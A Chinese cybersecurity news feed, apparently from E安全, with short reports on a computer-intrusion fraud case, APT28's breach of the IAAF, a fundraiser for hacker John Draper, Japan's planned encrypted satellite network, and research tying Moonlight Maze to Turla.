本案中,张帆以非法占有为目的,通过非法侵入计算机信息系统篡改商品价格再下单的方式,让商家错误地认为系正常交易行为,并自愿完成商品邮寄,最终导致商家损失人民币7万余元。

本案张帆基于诈骗犯罪的目的,客观上利用侵入计算机信息系统篡改价格的方式实行诈骗犯罪,根据我国《刑法》第287条规定:“利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的,依照本法有关规定定罪处罚”。 因此,张帆的行为构成诈骗罪。

近年来,我国立法在打击计算机犯罪方面正不断完善,既规定了非法侵入计算机信息系统罪,非法获取计算机信息系统数据、非法控制计算机信息系统罪,提供侵入、非法控制计算机信息系统的程序、工具罪和破坏计算机信息系统罪,又对其下游犯罪——明知是犯罪所得及其产生的收益而予以窝藏、转移、收购、代为销售或者以其他方法掩饰、隐瞒的,以掩饰、隐瞒犯罪所得、犯罪所得收益罪定罪处罚。本案中骗购的商品也是犯罪所得,若其他人明知是犯罪所得仍进行掩饰、隐瞒的,也涉嫌犯罪。0day

网络黑客组织APT28攻击国际田联

继世界反兴奋剂机构之后,国际田联也被网络黑客组织“APT28奇幻熊”给“盯”上了。

网络黑客组织APT28攻击国际田联-E安全

总部位于摩纳哥的国际田联3日发布公告,称“APT28奇幻熊”2月21日通过未经授权的远程途径危及其存有运动员“治疗用药豁免”申请的服务器。

国际田联今年1月联系到一家英国网络安全公司,对国际田联系统进行技术性调查,这家公司随后发现国际田联的系统遭到攻击,黑客组织从文件服务器中取出关于运动员“治疗用药豁免”的元数据,并将这些元数据存储到另一个新建文件中。

国际田联表示,尚不确定有经常盗取相关信息的行为,但黑客组织的兴趣和目的显而易见,并拥有随意获取文件内相关内容的途径和手段。

“运动员出于安全和保密考虑向国际田联提供相关信息,这应当作为我们的第一要务,”国际田联主席塞巴斯蒂安·科说,“对此我们表示最诚挚的歉意,并承诺在能力所及范围内尽一切努力挽救此事造成的影响。”

国际田联还表示,已经与2012年以来申请“治疗用药豁免”的运动员取得联系。

世界反兴奋剂机构数据库去年遭到“APT28奇幻熊”攻击,后者相继披露多批享有“治疗用药豁免”的运动员名单,“中招”的不乏威廉姆斯姐妹、拜尔斯、威金斯、纳达尔、福原爱等各项目明星运动员。

此后世界反兴奋剂机构发表声明,称该黑客组织来自俄罗斯的一家网络间谍机构,俄罗斯方面则否认与“奇幻熊”之间具有某种联系。俄罗斯总统普京发表声明,称“并不支持这样的 黑客 行为”,但同时也认为被曝光出来的资料应该引起公众的注意。0day

70年代早期知名黑客“嘎吱上尉”为术后康复在网上发起筹款活动

据外媒报道,70年代早期知名黑客约翰·德拉浦(John Draper,人称“嘎吱上尉”)曾是许多人的英雄,包括苹果联合创始人史蒂夫·沃茨尼亚克。然而现在,德拉浦病得很重。近日,他和他的朋友在网上启动了一个叫做GoFundMe的网页–用于为自己在3月28日接受的脊柱退变性疾病手术术后康复筹集资金。

70年代早期知名黑客“嘎吱上尉”为术后康复在网上发起筹款活动-E安全

约翰·德拉浦资料图

据了解,德拉浦术后康复将需要4到6个月的时间。如果他之前没有接受这一手术,那么他将可能要面临麻痹的危险。即便他现在已经接受了这一手术,他想要获得正常生活的几率仍旧只有50%。

GoFundMe将要为德拉浦筹集1.5万美元的资金。

德拉浦在个人Facebook上解释称,筹集的资金将能让他雇一个帮他送食物、买东西的人。另外他还谈到了目前的个人状况:“我现在躺在床上没法移动,所以我不得不依靠Siri。我想要感谢你们对我的关心和美好祝愿。”0day

日本计划花5-10年时间开发一套防黑客卫星系统

E安全4月4日讯 日本内政部与通信部计划开发一套通信系统,意在保护其卫星免受网络攻击影响。这套防黑客卫星系统将利用动态数据加密机制保护各卫星间与卫星至地面接收站间的传输过程。

日本计划花5-10年时间开发一套防黑客卫星系统-E安全

据美国纽约州水城市地方媒体《水城每日时报》报道,根据拟定之计划,日本政府的目标是建立一套安全的通信网络,旨在为日本提供独特的国内安全通信网络,同时刺激市场对于私营性质航空航天行业的投资。

作为一个极具野心的项目,这套防黑客卫星系统由日本国家信息通信技术研究所负责牵头——该机构隶属于通信部,并将在项目中引入多个政府机构、行业与学术组织。其目标是在未来五到十年内实现这套系统的商用化,通信部方面则将逐步制定一套方案以确保由私营部门(包括各企业与组织机构)运行的安全通信系统能够实现行业优势与成本效益。

关于这套防黑客卫星系统的最终决议将于今年夏季完成,而相关研发工作的资金则将被纳入2018财年的预算规划。

日本计划花5-10年时间开发一套防黑客卫星系统-E安全

网络攻击活动已经成为卫星通信领域的严重威胁,特别是卫星系统已然成为数字化社会当中至关重要的组成部分,几乎各个行业皆需要依赖于其服务。因此,卫星系统的安全保障也开始被纳入到全球各国政府网络安全战略当中并作为支柱性要求存在。

网络攻击者正对卫星运营商构成日益严峻的挑战,特别是考虑到商用卫星在安全水平方面相较于军事卫星往往存在巨大短板(关注E安全微信公众号EAQapp)。安全研究人员们正高度强调针对卫星系统的攻击活动可能造成的严重影响,同时敦促立足设计层面向其中引入更多安全防御机制。

卫星系统使用无线电波与地面基站进行通信,而黑客对此类内容进行拦截后很可能导致不可预知的严重后果。而有能力对加密数据进行解码的黑客,甚至能够窃取信息、篡改信息内容甚至获得对卫星的控制权。

针对卫星的网络攻击包括:干扰、欺骗以及攻击通信网络,或以控制系统或任务包为攻击目标,甚至可以攻击地面基础设施,比如卫星控制中心等。针对太空基础设施 的网络威胁包括:国与国之间的军事行动、资源丰富的犯罪组织寻求获得经济利益、恐怖组织宣传以及个人黑客想要炫耀技巧等。

各国政府则需要认真考虑民族国家支持型攻击者、犯罪集团乃至单一黑客发动之相关网络攻击威胁。据称国家资助型黑客曾分别于2007年到2008年对美国的两颗卫星进行干扰,且通过挪威地面站进行通信接入。这两颗卫星的主要功能在于进行气候监测。

当时,黑客们“对Terra AM-1卫星进行了全部入侵尝试”,但并未对其进行控制。一名获得了控制权限的攻击者甚至能够“拒绝、降级或者伪造乃至利用其它方式对卫星传输数据进行操纵”,或者简单采取破坏性操作及其它方式破坏卫星本体。

日本计划花5-10年时间开发一套防黑客卫星系统-E安全

去年8月,我们中国在酒泉卫星发射中心成功发射了世界上第一颗量子通信卫星“墨子号”,这项技术将有助于建立太空与地面间的“防御性”通信体系。

日本政府此次公布的项目计划在卫星上安装一套代码生成器,并利用其对数据进行动态加密。

动态代码将利用光束形式发送至地面基站。由于采用动态加密机制,因此黑客即使能够拦截传输内容,也很难成功实现数据解码。

这套代码生成器为一个小型立方体(每边长约10厘米),能够被轻松安装在发射企业开发的每侧边30到40厘米的微型卫星之上。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

网络间谍活动月光迷宫已演变成Turla

Thomas Rid经过大量的调查分析,在近期的安全分析师峰会(SAS)报告中指出:Moonlight Maze(月光迷宫)网络间谍们已经演变成了目前的Turla。

网络间谍活动月光迷宫已演变成Turla-E安全

1996年10月7日,美国科罗拉多矿业大学遭遇网络入侵。入侵者利用设备上安装的SUN OS4操作系统中的漏洞袭击了一台位于该校布朗大楼(Brown Building)内、昵称为“Baby_Doe”的电脑。他们通过这台电脑辗转进入美国国家航空航天局、美国海军和空军总部及遍及全美的高校和军事机构的其他电脑。

此项间谍行动持续了数年,搜集了大量敏感信息。后续调查发现,在此期间搜集的数据如打印成稿,其堆积的高度可堪比华盛顿纪念碑。调查者还注意到,大量的入侵行动发生在夜间。基于这一事实及入侵者袭击网络的交错复杂性,此次事件得名“月光迷宫”。随着调查的继续深入,入侵者渐出水面:俄罗斯特工。

严格意义上说,“月光迷宫”行动已停止。但此次间谍活动的代号蜂拥出现在杂志封面,甚至调查者所穿的T-shirt上。但这个代号已经成为了针对美国境内大量目标的俄罗斯网络间谍行动的代表。

年度卡巴斯基实验室在会议期间, Rid、Costin Raiu 和 Juan Andres Guerrero-Saade 提出了更多的证据,证明明确讲俄语的 apt,熟练的通过卫星链路劫持、政府网站水坑攻击、隐蔽后门、 rootkits,等手段窃取敏感西方目标机密。而上述一切似乎与 Agent.BTZ有着密不可分的联系。

网络间谍活动月光迷宫已演变成Turla-E安全

Agent.BTZ是Virus Bulletin 2014年由 Kurt Baumgartner发现的样本,该样本使用了卫星IP劫持技术,而这与后来Turla升级版使用的技术极为相似。

早期的月光迷宫针对诸如 Sun Solaris的UNIX 系统,而今天的 Turla APT目标则是Windows ,这么大的差距间是如何被关联起来的?

2014 年卡巴斯基宣布发现了 Penquin Turla(第一代),当时它利用的是开放源码 LOKI2 后门。LOKI2 是Alhambra 和 daemon9 在90年代后期于Phrack (杂志)发布的。(Penquin仍然在西方盛行,最新的版本1个月前在德国某系统中被发现)

Guerrero-Saade称:目前还没有看到任何其它攻击者利用该工具,这是月光迷宫攻击者的最爱~!在卡巴的45个月光迷宫的样本中9个利用了该后门。

他同时指出:可怕之处在于,20多“岁”的恶意软件在重新包装后仍然有效。编写于 1999 年,而链接的二进制文件,例如 Linux 2.2.0 和 2.2.5 libpcap  版本 ,21 世纪初的OpenSSL 从。从 2011年到上个月针对德国一个目标中仍然被发现了。

有趣的是侦察背后的故事:

谁有多年前被月光迷宫破坏的 Solaris 服务器呢?来自英国的管理员David Hedges帮了大忙。他与伦敦警察、FBI合作,保存了服务器的键盘记录和二进制文件移动记录,现在被称为 HRTest。

网络间谍活动月光迷宫已演变成Turla-E安全

Thomas Rid, David Hedges, Daniel Moore, and Juan Andres Guerrero-Saade

研究人员找到Hedges时,他已经是半退休状态了。但Hedges的服务器仍然运行,他共享了访问日志,以及 43个月光迷宫攻击中的二进制文件和一个工具包。(这个管理员   太  牛  了   吧~!)

研究人员称,下一步会把重点放在一个代号为风暴云(Storm Cloud)的计划中。通过超越“历史价值”的理解,审视恶意软件,发现“蛀虫”。0day